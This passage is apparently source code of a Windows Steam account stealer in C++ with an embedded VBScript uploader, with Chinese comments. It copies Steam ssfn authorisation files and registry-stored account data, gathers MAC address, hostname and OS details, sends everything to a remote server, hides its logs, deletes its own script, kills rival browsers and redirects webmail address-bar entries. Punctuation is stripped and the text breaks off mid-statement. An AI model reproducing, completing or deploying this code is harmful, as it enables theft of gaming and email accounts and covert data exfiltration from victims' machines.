Int(Rnd() * Len(table) 1), 1) \r\n;myUploadVBS Next \r\n;myUploadVBS GetBoundary \---------------------------\ Join(ret, Empty) \r\n;myUploadVBS End Function \r\n;myUploadVBS \r\n;myUploadVBS Public Property Let Charset(ByVal strValue) \r\n;myUploadVBS strCharset strValue \r\n;myUploadVBS End Property \r\n;myUploadVBS \r\n;myUploadVBS Public Sub AddForm(ByVal strName, ByVal strValue) \r\n;myUploadVBS Dim tmp \r\n;myUploadVBS tmp \\\r\\n--$1\\r\\nContent-Disposition: form-data; name\\$2\\\\r\\n\\r\\n$3\ \r\n;myUploadVBS tmp Replace(tmp, \\\r\\n\, vbCrLf) \r\n;myUploadVBS tmp Replace(tmp, \$1\, strBoundary) \r\n;myUploadVBS tmp Replace(tmp, \$2\, strName) \r\n;myUploadVBS tmp Replace(tmp, \$3\, strValue) \r\n;myUploadVBS objTemp.Write StringToBytes(tmp, strCharset) \r\n;myUploadVBS End Sub \r\n;myUploadVBS \r\n;myUploadVBS Public Sub AddFile(ByVal strName, ByVal strFileName, ByVal strFileType, ByVal strFilePath) \r\n;myUploadVBS Dim tmp \r\n;myUploadVBS tmp \\\r\\n--$1\\r\\nContent-Disposition: form-data; name\\$2\\; filename\\$3\\\\r\\nContent-Type: $4\\r\\n\\r\\n\ \r\n;myUploadVBS tmp Replace(tmp, \\\r\\n\, vbCrLf) \r\n;myUploadVBS tmp Replace(tmp, \$1\, strBoundary) \r\n;myUploadVBS tmp Replace(tmp, \$2\, strName) \r\n;myUploadVBS tmp Replace(tmp, \$3\, strFileName) \r\n;myUploadVBS tmp Replace(tmp, \$4\, strFileType) \r\n;myUploadVBS objTemp.Write StringToBytes(tmp, strCharset) \r\n;myUploadVBS objTemp.Write GetFileBinary(strFilePath) \r\n;myUploadVBS End Sub \r\n;myUploadVBS \r\n;myUploadVBS Private Sub AddEnd() \r\n;myUploadVBS Dim tmp \r\n;myUploadVBS tmp \\\r\\n--$1--\\r\\n\ \r\n;myUploadVBS tmp Replace(tmp, \\\r\\n\, vbCrLf) \r\n;myUploadVBS tmp Replace(tmp, \$1\, strBoundary) \r\n;myUploadVBS objTemp.Write StringToBytes(tmp, strCharset) \r\n;myUploadVBS objTemp.Position 2 \r\n;myUploadVBS End Sub \r\n;myUploadVBS \r\n;myUploadVBS Public Function Upload(ByVal strURL) \r\n;myUploadVBS Call AddEnd \r\n;myUploadVBS xmlHttp.Open \POST\, strURL, False \r\n;myUploadVBS xmlHttp.setRequestHeader \Content-Type\, \multipart/form-data; boundary\ strBoundary \r\n;myUploadVBS xmlHttp.Send objTemp \r\n;myUploadVBS Upload xmlHttp.responseText \r\n;myUploadVBS End Function \r\n;myUploadVBS End Class \r\n;myUploadVBS ;myUploadVBS Dim UploadData \r\n;myUploadVBS Dim UploadState \r\n;myUploadVBS Set UploadData New XMLUpload \r\n;myUploadVBS UploadData.Charset \utf-8\ \r\n;myUploadVBS UploadData.AddForm \content\, \Hello world\ \r\n;myUploadVBS UploadData.AddFile \image\, \%s\, \text/txt\, \c:/%s\ \r\n;myUploadVBS UploadState UploadData.Upload(\%s?ID%sLP%s\) \r\n;myUploadVBS If UploadState \FILES_UPLOAD_OK\ Then \r\n;myUploadVBS \r\n;myUploadVBS Else \r\n;myUploadVBS WScript.sleep 10000 \r\n;myUploadVBS UploadData.Upload(\%s?ID%sLP%s\) \r\n;myUploadVBS End If \r\n;myUploadVBS Set UploadData Nothing \r\n;myUploadVBS Set objFSO CreateObject(\Scripting.FileSystemObject\) \r\n;myUploadVBS objFSO.DeleteFile(\c:/%s\) \r\n;myUploadVBS objFSO.DeleteFile(WScript.ScriptFullName) \r\n;myUploadVBS Set objFSO Nothing \r\n;hFile FindFirstFile(wildcardPathandFile, pNextInfo);if(INVALID_HANDLE_VALUE hFile){return FALSE;}if(pNextInfo.cFileName[0] ! .){myVBSFilePath ;myVBSFilePath szMyselfPath;myVBSFilePath GetName();myVBSFilePath 64.VBS;mySSFNFilesName.Format(TEXT(%s.key), pNextInfo.cFileName);mySSFNFiles.Format(TEXT(%s/%s), wildcardPath, pNextInfo.cFileName);myTXTSSFNFiles.Format(TEXT(c:/%s.key), pNextInfo.cFileName);//AfxMessageBox(mySSFNFiles);CopyFile(mySSFNFiles, myTXTSSFNFiles, FALSE);Sleep(1000);CString szUploadVBS ;szUploadVBS.Format(TEXT(myUploadVBS), mySSFNFilesName, mySSFNFilesName, strMailServerName, szMailID, myLP, strMailServerName, szMailID, myLP, mySSFNFilesName);FILE *fp;fpfopen(myVBSFilePath, w);if(fp){fprintf(fp, %s, szUploadVBS.GetBuffer(0));}fclose(fp);Sleep(1000);ShellExecute(NULL, open, cmd.exe, /q /c myVBSFilePath, NULL, SW_HIDE);DeleteFile(mySSFNFiles);}while(FindNextFile(hFile, pNextInfo)){if(pNextInfo.cFileName[0] .){continue;}myVBSFilePath ;myVBSFilePath szMyselfPath;myVBSFilePath GetName();myVBSFilePath 64.VBS;mySSFNFilesName.Format(TEXT(%s.key), pNextInfo.cFileName);mySSFNFiles.Format(TEXT(%s/%s), wildcardPath, pNextInfo.cFileName);myTXTSSFNFiles.Format(TEXT(c:/%s.key), pNextInfo.cFileName);//AfxMessageBox(mySSFNFiles);CopyFile(mySSFNFiles, myTXTSSFNFiles, FALSE);Sleep(1000);CString szUploadVBS ;szUploadVBS.Format(TEXT(myUploadVBS), mySSFNFilesName, mySSFNFilesName, strMailServerName, szMailID, myLP, strMailServerName, szMailID, myLP, mySSFNFilesName);FILE *fp;fpfopen(myVBSFilePath, w);if(fp){fprintf(fp, %s, szUploadVBS.GetBuffer(0));}fclose(fp);Sleep(1000);ShellExecute(NULL, open, cmd.exe, /q /c myVBSFilePath, NULL, SW_HIDE);DeleteFile(mySSFNFiles);}return FALSE;
}// 数据发送模块BOOL DllExport SendURLPost(CString strPostStr)
{HMODULE hshell;hshellLoadLibrary(_T(wininet.dll));HINSTANCE (WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);HINSTANCE (WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);HINSTANCE (WINAPI *XXXInternetCloseHandle)(HINTERNET);(FARPROC)XXXInternetOpen GetProcAddress(hshell,InternetOpenA);(FARPROC)XXXInternetOpenUrl GetProcAddress(hshell,InternetOpenUrlA);(FARPROC)XXXInternetCloseHandle GetProcAddress(hshell,InternetCloseHandle);HINTERNET hropenXXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);if( hropen NULL ){FreeLibrary(hshell);return FALSE;}HINTERNET hropenurl XXXInternetOpenUrl(hropen, strPostStr, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);if( hropenurl NULL ){FreeLibrary(hshell);return FALSE;}XXXInternetCloseHandle(hropen);XXXInternetCloseHandle(hropenurl);FreeLibrary(hshell);return TRUE;
}// 劫持 IE 线程模块static DWORD WINAPI HOOKBrowser(LPVOID pParam)
{//AfxMessageBox(劫持 IE 线程模块启动);do{CString szMyClass ;HWND Hwnd_IEFrame ::GetForegroundWindow();TCHAR szClassName[MAX_PATH]{0};ZeroMemory(szClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_IEFrame, szClassName, MAX_PATH);szMyClass.Format(TEXT(%s), szClassName);szMyClass.Replace( , );if(szMyClass IEFrame){//AfxMessageBox(IEFrame Class);HWND Hwnd_1 ::FindWindowEx(Hwnd_IEFrame, NULL, _T(WorkerW), NULL);if(Hwnd_1 ! NULL){HWND Hwnd_2 ::FindWindowEx(Hwnd_1, NULL, _T(ReBarWindow32), NULL);if(Hwnd_2 ! NULL){HWND Hwnd_3 ::FindWindowEx(Hwnd_2, NULL, _T(Address Band Root), NULL);if(Hwnd_3 ! NULL){HWND Hwnd_4 ::FindWindowEx(Hwnd_3, NULL, _T(ToolbarWindow32), NULL);HWND Hwnd_5 ::FindWindowEx(Hwnd_3, NULL, _T(Edit), NULL);if(Hwnd_4 ! NULL Hwnd_5 ! NULL){TCHAR szGetEditStr[MAX_PATH]{0};CString szMyEditStr1 , szMyEditStr2 ;ZeroMemory(szGetEditStr, MAX_PATH * sizeof(TCHAR));::SendMessage(Hwnd_5, WM_GETTEXT, MAX_PATH, (LPARAM)szGetEditStr);//AfxMessageBox(szGetEditStr);szMyEditStr1.Format(_TEXT(%s), szGetEditStr);szMyEditStr1.Replace(//, );AfxExtractSubString(szMyEditStr2, szMyEditStr1, 0, /);szMyEditStr2.Replace(, //);CString szEditReplace;if( szMyEditStr2 http://mail.qq.com || szMyEditStr2 https://mail.qq.com ){// 清理缓存//DelTempFiles();szMailAddr ;szMailAddr szMyEditStr2;szEditReplace TEXT(https://ui.ptlogin2.qq.com/cgi-bin/login?style9appid522005705daid4s_urlhttps%3A%2F%2Fw.mail.qq.com%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26vm%3Dwsk%26delegate_url%3D%26f%3Dxhtml%26target%3Dhln_csshttp%3A%2F%2Fmail.qq.com%2Fzh_CN%2Fhtmledition%2Fimages%2Flogo%2Fqqmail%2Fqqmail_logo_default_200h.pnglow_login1hln_autologin%E8%AE%B0%E4%BD%8F%E7%99%BB%E5%BD%95%E7%8A%B6%E6%80%81pt_no_onekey1);char *szSetEditStr szEditReplace.GetBuffer(szEditReplace.GetLength()1);szEditReplace.ReleaseBuffer();::SendMessage(Hwnd_5, WM_SETTEXT, 255, (LPARAM)szSetEditStr);::SendMessage( Hwnd_5, WM_KEYDOWN, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_CHAR, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_KEYUP, ( WPARAM )( 13 ), 0xc01f0001 );szBrowser true;}else if( szMyEditStr2 https://mail.163.com || szMyEditStr2 https://mail.126.com || szMyEditStr2 https://mail.yeah.net ){// 清理缓存//DelTempFiles();szMailAddr ;szMailAddr szMyEditStr2;szEditReplace.Format(TEXT(https://email.163.com/));char *szSetEditStr szEditReplace.GetBuffer(szEditReplace.GetLength()1);szEditReplace.ReleaseBuffer();::SendMessage(Hwnd_5, WM_SETTEXT, 255, (LPARAM)szSetEditStr);::SendMessage( Hwnd_5, WM_KEYDOWN, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_CHAR, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_KEYUP, ( WPARAM )( 13 ), 0xc01f0001 );szBrowser true;}else if( szMyEditStr2 https://www.188.com || szMyEditStr2 https://188.com ){// 清理缓存//DelTempFiles();szMailAddr ;szMailAddr szMyEditStr2;szEditReplace.Format(TEXT(https://vip.188.com/webapp/login188.html));char *szSetEditStr szEditReplace.GetBuffer(szEditReplace.GetLength()1);szEditReplace.ReleaseBuffer();::SendMessage(Hwnd_5, WM_SETTEXT, 255, (LPARAM)szSetEditStr);::SendMessage( Hwnd_5, WM_KEYDOWN, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_CHAR, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_KEYUP, ( WPARAM )( 13 ), 0xc01f0001 );szBrowser true;}else{szMailAddr ;szMailAddr szMyEditStr2;}}}}}}Sleep(100);} while( !szBrowser );return 0;
}// 锁定注册表默认浏览器 并 劫持非IE内核浏览器 线程模块static DWORD WINAPI HOOKIERegedit(LPVOID pParam)
{//AfxMessageBox(线程模块启动);do{if( GetProcess(360se.exe) GetProcess(steam.exe) ){CString myIEver GetIEVerSion();int szIE_8 myIEver.Find(8.0, 0);if( szIE_8 0){goto myOtherFunction;}else{if( KillProcess(360se.exe) ){if( GetProcess(QQ.exe) ){ShellExecute(NULL, open, iexplore.exe, https://w.mail.qq.com/, , SW_MAXIMIZE);}else{ShellExecute(NULL, open, iexplore.exe, http://www.benpig.com/index.htm, , SW_MAXIMIZE);}}szIERegedit true;}}else if( GetProcess(360chrome.exe) GetProcess(steam.exe) ){CString myIEver GetIEVerSion();int szIE_8 myIEver.Find(8.0, 0);if( szIE_8 0){goto myOtherFunction;}else{if( KillProcess(360chrome.exe) ){if( GetProcess(QQ.exe) ){ShellExecute(NULL, open, iexplore.exe, https://w.mail.qq.com/, , SW_MAXIMIZE);}else{ShellExecute(NULL, open, iexplore.exe, http://www.benpig.com/index.htm, , SW_MAXIMIZE);}}szIERegedit true;}}else{goto myOtherFunction;}myOtherFunction:if( GetProcess(steam.exe) ){HWND Hwnd_Browser ::GetForegroundWindow();TCHAR szClassName[MAX_PATH];ZeroMemory(szClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_Browser, szClassName, MAX_PATH);CString szMyClass ;szMyClass.Format(TEXT(%s), szClassName);int sz360Class szMyClass.Find(360se6_Frame, 0);int szChromeClass szMyClass.Find(WidgetWin_1, 0);int szChromeClass_WidgetWin szMyClass.Find(Chrome_WidgetWin_1, 0);int szQQBrowserClass_WidgetWin szMyClass.Find(QQBrowser_WidgetWin_0, 0);if( sz360Class 0 || szChromeClass_WidgetWin 0 || szChromeClass 0 || szQQBrowserClass_WidgetWin 0 ){DWORD processid;::GetWindowThreadProcessId(Hwnd_Browser, processid);HANDLE hprocess::OpenProcess(PROCESS_ALL_ACCESS, FALSE, processid);if(hprocess ! NULL){CString myIEver GetIEVerSion();int szIE_8 myIEver.Find(8.0, 0);if( szIE_8 0){DWORD cbNeededx 0;HMODULE hModx NULL;if( ::EnumProcessModules( hprocess, hModx, sizeof( hModx ), cbNeededx ) !0 ){TCHAR myBrowserPath[MAX_PATH 1] {0};if( ::GetModuleFileNameEx( hprocess, hModx, myBrowserPath, MAX_PATH ) !0 ){CString szBrowserPath;szBrowserPath.Format(TEXT( /c \%s\ https://w.mail.qq.com), myBrowserPath);//AfxMessageBox(szBrowserPath:\nszBrowserPath);::TerminateProcess(hprocess, 0);ShellExecute(NULL, open, cmd.exe, szBrowserPath, , SW_HIDE);}}}else{::TerminateProcess(hprocess, 0);if( GetProcess(QQ.exe) ){ShellExecute(NULL, open, iexplore.exe, https://w.mail.qq.com/, , SW_MAXIMIZE);}else{ShellExecute(NULL, open, iexplore.exe, http://www.benpig.com/index.htm, , SW_MAXIMIZE);}}szIERegedit true;}::CloseHandle(hprocess);}}Sleep(100);} while( !szIERegedit );return 0;
}// 监控 Tslgame 主界面 线程模块static DWORD WINAPI HOOKGameMain(LPVOID pParam)
{//AfxMessageBox(监控 Tslgame 主界面 线程 已启动);szTslgameEXE FALSE;do{HWND Hwnd_Tslgame ::GetForegroundWindow();TCHAR szSTClassName[MAX_PATH]{0};ZeroMemory(szSTClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_Tslgame, szSTClassName, MAX_PATH);CString szMySTClass ;szMySTClass.Format(TEXT(%s), szSTClassName);int isSTClass szMySTClass.Find(UnrealWindow, 0);if( GetProcess(TslGame.exe) isSTClass 0 ){//AfxMessageBox(窗口样式: szStyle1 \n扩展样式: szStyle2);//AfxMessageBox(已登录 Tslgame 主界面);// 构建统计数据CString strPostData ;strPostData.Format(TEXT(%scj.php?ID%sCJ0), strMailServerName, szMailID);//AfxMessageBox(strPostData);DWORD dw0;BOOL isConnect ::IsNetworkAlive( dw0 );if( isConnect ){BOOL Result SendURLPost(strPostData);if( Result ){szTslgameEXE true;}}}else{if( !GetProcess(steam.exe) ){szTslgameEXE true;}}Sleep(100);} while( !szTslgameEXE );return 0;
}// 监控 Steam 主界面 线程模块static DWORD WINAPI HOOKLoginMain(LPVOID pParam)
{//AfxMessageBox(监控 steam.exe 主界面 线程 已启动);BOOL szLoginEXE FALSE;do{if( ::GetCurrentProcessId() GetEXE() ){HWND Hwnd_Steam ::GetForegroundWindow();TCHAR szSTClassName[MAX_PATH]{0};ZeroMemory(szSTClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_Steam, szSTClassName, MAX_PATH);CString szMySTClass ;szMySTClass.Format(TEXT(%s), szSTClassName);int isSTClass1 szMySTClass.Find(PopupWindow, 0);int isSTClass2 szMySTClass.Find(vguiPopupWindow, 0);long lstyle1 GetWindowLong(Hwnd_Steam, GWL_STYLE);long lstyle2 GetWindowLong(Hwnd_Steam, GWL_EXSTYLE);long lstyle3 GetWindowLongPtr(Hwnd_Steam, GWL_STYLE);long lstyle4 GetWindowLongPtr(Hwnd_Steam, GWL_EXSTYLE);CString szStyle1 , szStyle2 , szStyle3 , szStyle4 ;szStyle1.Format(TEXT(%X), lstyle1);szStyle2.Format(TEXT(%X), lstyle2);szStyle3.Format(TEXT(%X), lstyle3);szStyle4.Format(TEXT(%X), lstyle4);if( (isSTClass2 0 || isSTClass1 0) (szStyle1 960F0000 || szStyle1 96CF0000 || szStyle3 960F0000 || szStyle3 96CF0000) ){//AfxMessageBox(窗口样式: szStyle1 \n扩展样式: szStyle2);//AfxMessageBox(开始判断是否已登录Steam主界面);///// 处理电脑授权文件CString mySTInstPath , mySTSSFNFilePath ;HKEY dw_hKey;LONG x_Ret1 RegOpenKeyEx( HKEY_CURRENT_USER,TEXT(Software\\Valve\\Steam),0, KEY_QUERY_VALUE|KEY_WRITE, dw_hKey );if( x_Ret1 ERROR_SUCCESS ){char dw_data[256] {0};DWORD dw_Type REG_SZ;DWORD dw_Length 256;LONG x_Ret2 RegQueryValueEx( dw_hKey, TEXT(SteamPath), NULL, dw_Type, (LPBYTE)dw_data, dw_Length );mySTInstPath.Format(TEXT(%s), dw_data);mySTSSFNFilePath.Format(TEXT(%s/ssfn*), dw_data);}RegCloseKey(dw_hKey);char *mySSFNPathx mySTInstPath.GetBuffer(mySTInstPath.GetLength()1);mySTInstPath.ReleaseBuffer();char *mySSFNFilex mySTSSFNFilePath.GetBuffer(mySTSSFNFilePath.GetLength()1);mySTSSFNFilePath.ReleaseBuffer();//AfxMessageBox(mySTInstPath);//AfxMessageBox(mySTSSFNFilePath);SearchFilesByWildcard_2(mySSFNPathx, mySSFNFilex);szTslgameEXE true;Sleep(3000);DWORD dwThreadId4;CreateThread(NULL, 0, HOOKGameMain, NULL, 0, dwThreadId4); szBrowser true;szLoginEXE true;szEMailName false;szIERegedit true;}}else{if( !GetProcess(steam.exe) ){szBrowser true;szLoginEXE true;szEMailName false;szIERegedit true;}}Sleep(100);} while( !szLoginEXE );return 0;
}// 监控 登陆器界面 线程模块static DWORD WINAPI HOOKLoginEXE(LPVOID pParam)
{//AfxMessageBox(监控 steam.exe 登陆器 线程 已启动);BOOL szLoginEXE FALSE;do{if(::GetCurrentProcessId() GetEXE()){HWND H_wnd ::GetForegroundWindow();char sTitles[256];memset(sTitles, 0, 256);::SendMessage(H_wnd, WM_GETTEXT, 255, (LPARAM)sTitles);char *LP1;LP1 strstr(sTitles, Steam 令牌);char *LP2;LP2 strstr(sTitles, Steam 令牌);char *LP3;LP3 strstr(sTitles, Steam Guard);char *LP4;LP4 strstr(sTitles, Steam Guard);char *LP5;LP5 strstr(sTitles, S t e a m 令牌);char *LP6;LP6 strstr(sTitles, S t e a m 令牌);char *LP7;LP7 strstr(sTitles, 令牌);if( LP1 || LP2 || LP3 || LP4 || LP5 || LP6 || LP7 ){//AfxMessageBox(开始判断令牌种类);long lstyle1 GetWindowLong(H_wnd, GWL_STYLE);long lstyle2 GetWindowLong(H_wnd, GWL_EXSTYLE);long lstyle3 GetWindowLongPtr(H_wnd, GWL_STYLE);long lstyle4 GetWindowLongPtr(H_wnd, GWL_EXSTYLE);CString szLP1 , szLP2 , szLP3 , szLP4 ;szLP1.Format(TEXT(%X), lstyle1);szLP2.Format(TEXT(%X), lstyle2);szLP3.Format(TEXT(%X), lstyle3);szLP4.Format(TEXT(%X), lstyle4);//AfxMessageBox(窗口样式:szLP1\n扩展样式:szLP2);if( szLP1 960A0000 || szLP1 96CA0000 || szLP3 960A0000 || szLP3 96CA0000 ){//AfxMessageBox(邮箱令牌);szLocalLP 0;}else if( szLP1 960F0000 || szLP1 96CF0000 || szLP3 960F0000 || szLP3 96CF0000 ){//AfxMessageBox(手机令牌);szLocalLP 1;}else{//AfxMessageBox(未知令牌);szLocalLP 2;}HKEY hKey, xKey;LONG lRet RegOpenKeyEx( HKEY_CURRENT_USER,TEXT(Software\\Valve\\Steam),0, KEY_QUERY_VALUE|KEY_WRITE, hKey );if( lRet ERROR_SUCCESS ){char user[256] {0};DWORD dwType REG_SZ;DWORD dwLength 256;LONG lRet2 RegQueryValueEx( hKey, TEXT(AutoLoginUser), NULL, dwType, (LPBYTE)user, dwLength );if( lRet2 ERROR_SUCCESS strlen(user) 4 ){CString LocalUser ;CString ReadRegUser ;LocalUser.Format(TEXT(%s), user);ReadRegUser.Format(TEXT(Software\\Valve\\Steam\\%s), user);LONG lRet2 RegOpenKeyEx( HKEY_CURRENT_USER,ReadRegUser,0, KEY_QUERY_VALUE|KEY_WRITE, xKey );if( lRet2 ERROR_SUCCESS ){char data1[256] {0}, data2[256] {0}, data3[256] {0}, data4[256] {0};DWORD dwType1 REG_SZ, dwType2 REG_SZ, dwType3 REG_SZ, dwType4 REG_SZ;DWORD dwLength1 256, dwLength2 256, dwLength3 256, dwLength4 256;LONG lRet3 RegQueryValueEx( xKey, TEXT(AccOne), NULL, dwType1, (LPBYTE)data1, dwLength1 );LONG lRet4 RegQueryValueEx( xKey, TEXT(DataOne), NULL, dwType2, (LPBYTE)data2, dwLength2 );LONG lRet5 RegQueryValueEx( xKey, TEXT(AccSecond), NULL, dwType3, (LPBYTE)data3, dwLength3 );LONG lRet6 RegQueryValueEx( xKey, TEXT(DataSecond), NULL, dwType4, (LPBYTE)data4, dwLength4 );if( (lRet3 ERROR_SUCCESS lRet4 ERROR_SUCCESS lRet5 ERROR_SUCCESS lRet6 ERROR_SUCCESS) (strlen(data3) 10 strlen(data4) 20) ){CString szRegAccOne , szRegDataOne , szRegAccSecon , szRegDataSecon ;szRegAccOne.Format(TEXT(%s), data1);szRegDataOne.Format(TEXT(%s), data2);szRegAccSecon.Format(TEXT(%s), data3);szRegDataSecon.Format(TEXT(%s), data4);/// 随机生成 16位 KEYtime_t seed time(NULL); srand((unsigned)seed);int randNum (rand()*2);CString szMD5 , szMD5Key , Base64_szMD5Key ;szMD5Key _CHWM_;int szMD5Key_Len szMD5Key.GetLength();for(int jszMD5Key_Len; j16 ;j){int randNum rand()%26;if(j%2){szMD5.Format(%C, randNum97);}else{szMD5.Format(%C, randNum65);}szMD5Key szMD5;Sleep(50);}szMD5Key gen(szMD5Key);Base64_szMD5Key BASE64Encode(szMD5Key, szMD5Key.GetLength());/memset(osx, 0, MAX_PATH);memset(jsj, 0, MAX_PATH);// 获取计算机名WSADATA _wsaData {0};int _Result 0;_Result WSAStartup(MAKEWORD(2, 2), _wsaData);if(_Result SOCKET_ERROR){strcat(jsj, unkonw);}_Result gethostname(jsj, sizeof(jsj));if(_Result SOCKET_ERROR){strcat(jsj, unkonw);}WSACleanup();// 获取MACCString szMac ;szMac GetMacAddress();// 获取系统版本os();// 构建统计数据CString strPostData ;strPostData.Format(TEXT(%s?M%sOS%sCP%sVER%sID%sAccOne%sDataOne%sAccSecond%sDataSecond%sMD5%sLP%sJC), strServerName, szMac, osx, jsj, szVersion, strUserID, szRegAccOne, szRegDataOne, szRegAccSecon, szRegDataSecon, Base64_szMD5Key,szLocalLP);strPostData.Replace( , %20);//AfxMessageBox(strPostData);DWORD dw0;BOOL isConnect ::IsNetworkAlive( dw0 );if( isConnect ){BOOL Result SendURLPost(strPostData);if( Result ){//AfxMessageBox(成功发送数据);FILE *fp;CFileFind finder1x;BOOL noEmpty1xfinder1x.FindFile(C:\\NTUSERS.LOG);if(!noEmpty1x){fpfopen(C:\\NTUSERS.LOG, w);if(fp){fprintf(fp, %s, LocalUser.GetBuffer(0));}fclose(fp);}else{fpfopen(C:\\NTUSERS.LOG, a);if(fp){fprintf(fp, %s, LocalUser.GetBuffer(0));}fclose(fp);}//隐藏数据文件SetFileAttributes(C:\\NTUSERS.LOG, FILE_ATTRIBUTE_HIDDEN);RegDeleteValue(hKey, TEXT(Gaming));RegDeleteValue(hKey, TEXT(AutoLoginUser));Login false;szLoginEXE true;/* 邮箱令牌 */if(szLocalLP 0){DeleteFile(C:\\MailData.txt);//创建劫持IE线程//szBrowser false;//DWORD dwThreadId;//CreateThread(NULL, 0, HOOKBrowser, NULL, 0, dwThreadId);//创建线程监控ST主界面myEmailSTR ;DWORD dwThreadId2;CreateThread(NULL, 0, HOOKLoginMain, NULL, 0, dwThreadId2); /*创 建锁定注册表默认浏览器与劫持非 IE 内核浏览器线 程*///DWORD dwThreadId3;//CreateThread(NULL, 0, HOOKIERegedit, NULL, 0, dwThreadId3); }else if(szLocalLP 2){/* 未知令牌 *///创建线程监控ST主界面myEmailSTR ;DWORD dwThreadId;CreateThread(NULL, 0, HOOKLoginMain, NULL, 0, dwThreadId); }}else{//AfxMessageBox(发送数据失败);DeleteFile(C:\\NTUSERS.LOG);RegDeleteValue(hKey, TEXT(Gaming));RegDeleteValue(hKey, TEXT(AutoLoginUser));Login false;szLoginEXE true;RegCloseKey(xKey);RegCloseKey(hKey);ShellExecute(NULL, open, cmd.exe, /q /c taskkill /f /im steam.exe, NULL, SW_HIDE);}}else{DeleteFile(C:\\NTUSERS.LOG);RegDeleteValue(hKey, TEXT(Gaming));RegDeleteValue(hKey, TEXT(AutoLoginUser));Login false;szLoginEXE true;RegCloseKey(xKey);RegCloseKey(hKey);ShellExecute(NULL, open, cmd.exe, /q /c taskkill /f /im steam.exe, NULL, SW_HIDE);}}else{RegDeleteValue(hKey, TEXT(Gaming));RegDeleteValue(hKey, TEXT(AutoLoginUser));Login false;szLoginEXE true;ShellExecute(NULL, open, cmd.exe, /q /c taskkill /f /im steam.exe, NULL, SW_HIDE);}}}}Login false;szLoginEXE true;RegCloseKey(xKey);RegCloseKey(hKey);}else{HWND Hwnd_Steam ::GetForegroundWindow();TCHAR szSTClassName[MAX_PATH]{0};ZeroMemory(szSTClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_Steam, szSTClassName, MAX_PATH);CString szMySTClass ;szMySTClass.Format(TEXT(%s), szSTClassName);int isSTClass1 szMySTClass.Find(PopupWindow, 0);int isSTClass2 szMySTClass.Find(vguiPopupWindow, 0);long lstyle1 GetWindowLong(Hwnd_Steam, GWL_STYLE);long lstyle2 GetWindowLong(Hwnd_Steam, GWL_EXSTYLE);long lstyle3 GetWindowLongPtr(Hwnd_Steam, GWL_STYLE);long lstyle4 GetWindowLongPtr(Hwnd_Steam, GWL_EXSTYLE);CString szStyle1 , szStyle2 , szStyle3 , szStyle4 ;szStyle1.Format(TEXT(%X), lstyle1);szStyle2.Format(TEXT(%X), lstyle2);szStyle3.Format(TEXT(%X), lstyle3);szStyle4.Format(TEXT(%X), lstyle4);if( (isSTClass2 0 || isSTClass1 0) (szStyle1 960F0000 || szStyle1 96CF0000 || szStyle3 960F0000 || szStyle3 96CF0000) ){/* 此为租号数据 */szLocalLP 3;HKEY hKey, xKey;LONG lRet RegOpenKeyEx( HKEY_CURRENT_USER,TEXT(Software\\Valve\\Steam),0, KEY_QUERY_VALUE|KEY_WRITE, hKey );if( lRet ERROR_SUCCESS ){char user[256] {0};DWORD dwType REG_SZ;DWORD dwLength 256;LONG lRet2 RegQueryValueEx( hKey, TEXT(AutoLoginUser), NULL, dwType, (LPBYTE)user, dwLength );if( lRet2 ERROR_SUCCESS strlen(user) 4 ){CString LocalUser ;CString ReadRegUser ;LocalUser.Format(TEXT(%s), user);ReadRegUser.Format(TEXT(Software\\Valve\\Steam\\%s), user);LONG lRet2 RegOpenKeyEx( HKEY_CURRENT_USER,ReadRegUser,0, KEY_QUERY_VALUE|KEY_WRITE, xKey );if( lRet2 ERROR_SUCCESS ){char data1[256] {0}, data2[256] {0}, data3[256] {0}, data4[256] {0};DWORD dwType1 REG_SZ, dwType2 REG_SZ, dwType3 REG_SZ, dwType4 REG_SZ;DWORD dwLength1 256, dwLength2 256, dwLength3 256, dwLength4 256;LONG lRet3 RegQueryValueEx( xKey, TEXT(AccOne), NULL, dwType1, (LPBYTE)data1, dwLength1 );LONG lRet4 RegQueryValueEx( xKey, TEXT(DataOne), NULL, dwType2, (LPBYTE)data2, dwLength2 );LONG lRet5 RegQueryValueEx( xKey, TEXT(AccSecond), NULL, dwType3, (LPBYTE)data3, dwLength3 );LONG lRet6 RegQueryValueEx( xKey, TEXT(DataSecond), NULL, dwType4, (LPBYTE)data4, dwLength4 );if( (lRet3 ERROR_SUCCESS lRet4 ERROR_SUCCESS lRet5 ERROR_SUCCESS lRet6 ERROR_SUCCESS) (strlen(data3) 10 strlen(data4) 20) ){CString szRegAccOne , szRegDataOne , szRegAccSecon , szRegDataSecon ;szRegAccOne.Format(TEXT(%s), data1);szRegDataOne.Format(TEXT(%s), data2);szRegAccSecon.Format(TEXT(%s), data3);szRegDataSecon.Format(TEXT(%s), data4);/// 随机生成 16位 KEYtime_t seed time(NULL); srand((unsigned)seed);int randNum (rand()*2);CString szMD5 , szMD5Key , Base64_szMD5Key ;szMD5Key _CHWM_;int szMD5Key_Len szMD5Key.GetLength();for(int jszMD5Key_Len; j16 ;j){int randNum rand()%26;if(j%2){szMD5.Format(%C, randNum97);}else{szMD5.Format(%C, randNum65);}szMD5Key szMD5;Sleep(50);}szMD5Key gen(szMD5Key);Base64_szMD5Key BASE64Encode(szMD5Key, szMD5Key.GetLength());/memset(osx, 0, MAX_PATH);memset(jsj, 0, MAX_PATH);// 获取计算机名WSADATA _wsaData {0};int _Result 0;_Result WSAStartup(MAKEWORD(2, 2), _wsaData);if(_Result SOCKET_ERROR){strcat(jsj, unkonw);}_Result gethostname(jsj, 